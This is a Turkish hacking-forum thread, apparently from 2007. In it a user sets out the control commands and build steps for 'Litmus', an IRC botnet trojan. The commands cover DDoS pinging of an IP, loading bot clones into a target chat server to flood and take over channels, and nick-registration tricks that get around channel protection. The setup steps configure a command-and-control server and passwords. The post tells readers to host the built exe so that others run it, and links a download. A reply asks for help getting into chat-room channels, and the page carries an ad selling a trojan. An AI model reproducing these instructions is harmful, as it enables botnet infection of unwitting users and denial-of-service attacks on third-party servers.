Litmus Download Yonetim Komutlari ve Kurulum AnlatimiArama yaptim ama bulamadim eger verilmise ve benim dikkatsizligimden kaynaklanmisa affola diyorum. BasliyaLim ; .ident bu komutla trojene verdigimiz ?ifre ile kendimizi tanytyryz (not:ident`inizde lit kelimesi olmak zorunda) .ping
Konu IceberG tarafından açılmış, 1390 kişi tarafından görüntülenip, 3 yanıt almış.
|
Özel Yazılım Trojan+, güncellemeli ve garantili. Sadece 690TL! Kredi kartınıza 12 taksit kolaylığı!
|
|||||||
Litmus Download Yonetim Komutlari ve Kurulum Anlatimi konusundaki toplam yorum: 3, okunma sayısı: 1390. |
|
|
|||||||||||||||||||||||||||||||||||||||
|
|
#1 |
|
Cool Üye
![]() ![]() ![]() Kayıt Tarihi: Dec 2006
Üye numarası: #100094
Karma etkisi: 0
![]() ![]() Karma: -113
|
Arama yaptim ama bulamadim eger verilmise ve benim dikkatsizligimden kaynaklanmisa affola diyorum. BasliyaLim ;
.ident <?ifre> bu komutla trojene verdigimiz ?ifre ile kendimizi tanytyryz (not:ident`inizde lit kelimesi olmak zorunda) .ping <IP> <zaman> Bu ping atmaya yarar yani bir nevi ddostur ( ORN: .ping 208.47.125.133 60 ) .clones load <server> <port> <sayy> trojenleri baska servera yollar yani saldyrynyn asyl yeridir ( ORN: .clones load irc.zurna.net 6667 3 ) (not:En fazla bir IP den 40 tane sokarsynyz yani .clones load irc.zurna.net 6667 40)tabi ?unuda unutmayalym zurna gibi buyuk serverlarda 1 IP den en fazla 4 kisi girer .clones raw <komut> Bunla bildigimiz komutlary trojene yaptyrabiliriz ORN: .clones raw part #zurna .clones die bu komutla trojenleri yolladygymyz serverdan cykaryryz yani saldyry bitirmek icindir. .raw <komut> Bu komutla trojenlerin bulundugu asil (yani biriktilen) serverda kullanmaya yarar ORN: .raw join #sohbet .die Bu tehlikeli bir koddur bunu yaptigimizda butun trojenler gider birdaha gelmezler !!! Bazy ek saldyry komutlary : .clones raw cycle #kanal Botlaryn saldyrdygynyz serverda o kanaldan cykyp girmesini saglar (join/part) .clones raw privmsg #kanal Botlaryn belirttiginiz kanala mesaj atmasyny saglar NOT:mesajynyzn arasynda bo?luklar byrakmayynyz yoksa gitmez ORN:BURAYI-DAGITACAGIM-BILIN bu sekilde yollayin .clones raw privmsg nick Buda nicke mesaj atmaktir .clones raw join #kanal Bot saldiridiginiz serverdaki kanala girer .clones raw part #kanal Belirttiginiz kanaldan cikar .clones raw nickserv register sifre Bu guzel bir komut kanal +R ye alindiginda trojenlerin nicklerini sifreleyerek saldiriya dewam edebilirsiniz ORN: .clones raw nickserv register 12345 Umarim Isinize yarar SaygiLar.. ArkadaLar Buradan Indire biLirsiniz ; Litmus Indirmek Icin Tiklayin Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=113763 KuruLumu Hakkindada Biraz biLgi ekLicem yarim yamaLak oLdu Ama temez oLsun Bari ![]() KuruLumu ; Gerekli dosyalar : config.exe , litmus.dat , msgsrv32.exe ve tabiki bir server'a sahip olmanız gerekiyor.. İlk olarak indirdiğimiz config.exe yi çalıştırıyoruz.. Server yazan kısma trojenlerin barınacağı serverin adresini irc.serveradi.com şeklinde yazıyoruz. Channel yazan kısma trojenlerin gireceği kanalı yazıyoruz #kanal şeklinde.. Server pass yazan kısma serverdaki ident'inizi yazacaksınız ki botlar sizi tanıyabilsin.. ancak yazacağınız kelimenin içinde lit hecesinin olması gerekiyor.. Channel key bu bölüme trojenlerin barınacağı kanalın şifresini yazıyoruz.. Bot Pass bu bölüme trojenleri yöneteceğimiz şifreyi yazıyoruz. Nick Prefix Bölümüne trojenlerin barınacağı servera hangi nick ile bağlanmasını istiyorsak onu yazıyoruz.. Örnek : Misafir What do you want şeklinde başlayan bölüme ise MSGSRV32.exe yazıyoruz ve enter yapıyoruz.. daha sonra pencere kapanıyor.. Exe'miz hazır haLe geliyor..Exeyi çalıştırdığımızda ise serverimize trojenlerimiz bağlanmış olacaklardır.. Trojenleri yaymak için exe'yi bir siteye download edip başkalarına çalıştırtmanız gerekmektedir.. Düzenleyen IceberG : 15-01-2007 at 02:12. |
|
|
|
|
|
#2 |
|
Çırak
![]() Kayıt Tarihi: Jan 2006
Üye numarası: #50227
![]() Karma: 10
|
tşkrler kardeş..
|
|
|
|
|
|
#3 |
|
Cool Çırak
![]() Kayıt Tarihi: Feb 2007
Üye numarası: #108135
Karma etkisi: 7
![]() ![]() Karma: 116
|
IRC Contact daha kullanıslı geldi bana tesekkurler.
|
|
|
|
|
|
#4 |
|
Çırak
![]() Kayıt Tarihi: Aug 2008
Üye numarası: #247155
![]() Karma: 10
|
ya arkadşım emegine saglıkta 1sey soracam kanal sifresi diorsun ben mynet sohbet odalarına takılıyorum kanalın şifresini nasıl bulacam?biraz yardımcı olursan senirim ben yeniyim burda şimdiden saol
|
|
|
|
![]() |
| Şu Anda Konuyu Görüntüleyenler: 1 (0 üye ve 1 misafir) | |
| Konu Araçları | Bu Konuda Ara |
|
|